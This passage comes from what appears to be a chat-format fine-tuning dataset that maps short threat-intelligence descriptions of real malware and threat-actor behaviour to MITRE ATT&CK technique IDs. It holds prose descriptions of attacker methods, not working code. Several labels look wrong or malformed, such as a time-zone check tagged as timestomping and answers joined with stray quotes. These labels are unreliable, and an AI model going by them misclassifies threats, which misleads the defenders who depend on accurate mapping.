- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Matryoshka uses reflective DLL injection to inject the malicious library and execute the RAT."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KeyBoy uses \"-w Hidden\" to conceal a PowerShell window that downloads a payload."
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Since December 2017 security researchers have been seeing samples of MS Office documents in spearphishing emails related to the Winter Olympics uploaded to VirusTotal. The documents contained nothing but slightly formatted gibberish to make it look like the text had an encoding problem, encouraging the user to press a button to “Enable Content”."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A variant of attempts communication to the C2 server over HTTP on port 443."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "They stop the Volume Shadow Copy service; the ransomware itself includes a command to delete existing shadow copies"
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conti has the ability to discover hosts on a target network."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "actors use nbtscan to discover vulnerable systems."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ccf32 can collect files from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 4 Microsoft Word attempting to download the remote template If the C2 server is active at the time the document is opened, it will successfully retrieve the malicious macro and load it in the same Microsoft Word session"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LAPSUS$ has purchased credentials and session tokens from criminal underground forums."
- },
- {
- "role": "assistant",
- "content": "T1597.002 - Purchase Technical Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It is notable that we have only seen these exploitation attempts leverage publicly available malware such as Cobalt Strike and Meterpreter. While these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance. In 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks. This new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has retrieved internal documents from machines inside victim environments, including by using to stage documents before."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ABK has the ability to use cmd to run a Portable Executable (PE) on the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SDBbot has sent collected data from a compromised host to its C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Maze has used the “Wow64RevertWow64FsRedirection” function following attempts to delete the shadow volumes, in order to leave the system in the same state as it was prior to redirection."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The main function of the dropper All strings within the dropper, as well as the backdoor, are encrypted using a hardcoded RSA256 key"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware has used base64-encoded commands and files, and has also encrypted embedded strings with AES."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "performed a watering hole attack on forbes.com in 2014 to compromise targets."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "sends images to users that are embedded with shellcode and obfuscates strings and payloads."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Koadic can run a command on another machine using PsExec."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 has used compromised identities to access VPNs and remote access tools."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cuba can download files from its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has encoded PowerShell commands."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MBR + overwrite/wipe"
- },
- {
- "role": "assistant",
- "content": "T1561.002 - Disk Structure Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros. The attackers rely on a range of compromised hosts to deliver their attacks"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group malware can insert malicious macros into documents using a \"Microsoft.Office.Interop\" object."
- },
- {
- "role": "assistant",
- "content": "T1559.001 - Component Object Model"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Many strings in JHUHUGIT are obfuscated with a XOR algorithm."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 has used WMI to install malware on targeted systems."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "jRAT can be configured to reconnect at certain intervals."
- },
- {
- "role": "assistant",
- "content": "T1029 - Scheduled Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has modified the Registry key \"HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\" by setting the \"UseLogonCredential\" registry value to \"1\" in order to force credentials to be stored in clear text in memory."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Elise encrypts exfiltrated data with RC4."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Equation is known to have the capability to overwrite the firmware on hard drives from some manufacturers."
- },
- {
- "role": "assistant",
- "content": "T1542.002 - Component Firmware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32's backdoor can exfiltrate data by encoding it in the subdomain field of DNS packets."
- },
- {
- "role": "assistant",
- "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Okrum has used base64 to encode C2 communication."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 has used a wide variety of ransomware, such as Clop, Locky, Jaff, Bart, Philadelphia, and GlobeImposter, to encrypt victim files and demand a ransom payment."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "H1N1 encrypts C2 traffic using an RC4 key."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used HTTP, HTTPS, and DNS for command and control."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "On October 10, 2017, Kaspersky Lab’s advanced exploit prevention systems identified a new Adobe Flash zero day exploit used in the wild against our customers"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team defaced approximately 15,000 websites belonging to Georgian government, non-government, and private sector organizations in 2019."
- },
- {
- "role": "assistant",
- "content": "T1491.002 - External Defacement"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "may be used to gather details from the Windows Registry of a local or remote system at the command-line interface."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to download a file to the victim from the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "sets a WH_CBT Windows hook to collect information on process creation."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWiper can call multiple Windows API functions used for privilege escalation, service execution, and to overwrite random bites of data."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GoldenSpy has been packaged with a legitimate tax preparation software."
- },
- {
- "role": "assistant",
- "content": "T1195.002 - Compromise Software Supply Chain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used tools to compress data before exfilling it."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerPunch can download payloads from adversary infrastructure."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the system information, including hostname and OS version, and sends it to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The most notable change to this variant of Zebrocy, other than the programming language used, is the way the tool gathers the system information and running processes"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "On June 12, QakBot continued its evolution. The delivery method of a .ZIP file to malicious .VBS was the same, but this time QakBot also dropped a Zloader payload on its victim. Beginning around 14:24 UTC, Falcon Complete observed QakBot threat actors using a new .VBS payload"
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The PowerShell script is responsible for downloading the final payload from C2 server to execute it"
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Trojan compares the TimeZone.CurrentTimeZone.DaylightName property to strings Iran, Arab, Arabia and Middle East, which will match the following time zones in Windows: Arabic Daylight Time (UTC+3) Arab Daylight Time (UTC+3) Arabian Daylight Time (UTC+4) Middle East Daylight Time (UTC+2) Iran Daylight Time (UTC+3.5) According to MSDN, these five time zones encompass 10 countries that fall within UTC+2, +3, +3.5 or +4 as seen in Figure 3"
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp', 'T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "At the beginning of October 2021, Proofpoint researchers identified public samples of Gamaredon RTF template injection documents which impersonated the Ukrainian Ministry of Defense. This tactic is consistent with reporting on this APT group that links Gamaredon to the Russian FSB operating in the Republic of Crimea and the city of Sevastopol. The files communicate with the domain pretence77.glorious[.]nonima[.]ru which also was a remote template delivery URL used by several Microsoft Office Word documents that impersonated Ukrainian government organizations. These Office files communicate with actor infrastructure using a URI pattern previously observed among Gamaredon malicious Microsoft Office phishing documents. Specifically, the Microsoft Office documents used remote template injection to retrieve malicious payload files using URIs with the directory “/ELENAPC/principles/” on several occasions. Additionally, in several instances the resources retrieved delivered an MP3 file as a delivery resource"
- },
- {
- "role": "assistant",
- "content": "T1221 - Template Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors have been observed: Using commercial cloud storage services for command and control. Using malware implants that use the Dropbox API for C2 and a downloader that downloads and executes a payload using the Microsoft OneDrive API."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUGARDUMP has been named `CrashReporter.exe` to appear as a legitimate Mozilla executable."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN4 has presented victims with spoofed Windows Authentication prompts to collect their credentials."
- },
- {
- "role": "assistant",
- "content": "T1056.002 - Input Capture: GUI Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grandoreiro can hook APIs, kill processes, break file system paths, and change ACLs to prevent security tools from running."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can obtain screenshots from the victim."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RCSession can remove files from a targeted system."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses custom base64 encoding to obfuscate HTTP traffic."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWizard has been signed by valid certificates assigned to Hermetica Digital."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 leveraged spearphishing emails with malicious attachments to initially compromise victims."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FELIXROOT deletes the Registry key \"HKCU\\Software\\Classes\\Applications\\rundll32.exe\\shell\\open\"."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has relied on users to download and execute malicious Docker images."
- },
- {
- "role": "assistant",
- "content": "T1204.003 - User Execution: Malicious Image"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can upload, download, and execute files on the victim."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "78 runin.bin List of processes names and associated plugins should be run inside these processes"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Goopy has impersonated the legitimate goopdate.dll, which was dropped on the target system with a legitimate GoogleUpdate.exe."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects information on running processes and environment variables from the victim."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Micropsia has keylogging capabilities."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gazer identifies a proxy server if it exists and uses it to make HTTP requests."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZLib has the ability to download files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects keystrokes from the victim machine."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SodaMaster can use \"RegOpenKeyW\" to access the Registry."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NativeZone can display an RTF document to the user to enable execution of Cobalt Strike stage shellcode."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Epic uses the \"net use\", \"net session\", and \"netstat\" commands to gather information on network connections."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FunnyDream has the ability to discover processes, including `Bka.exe` and `BkavUtil.exe`."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CosmicDuke contains a custom version of the RC4 algorithm that includes a programming error."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
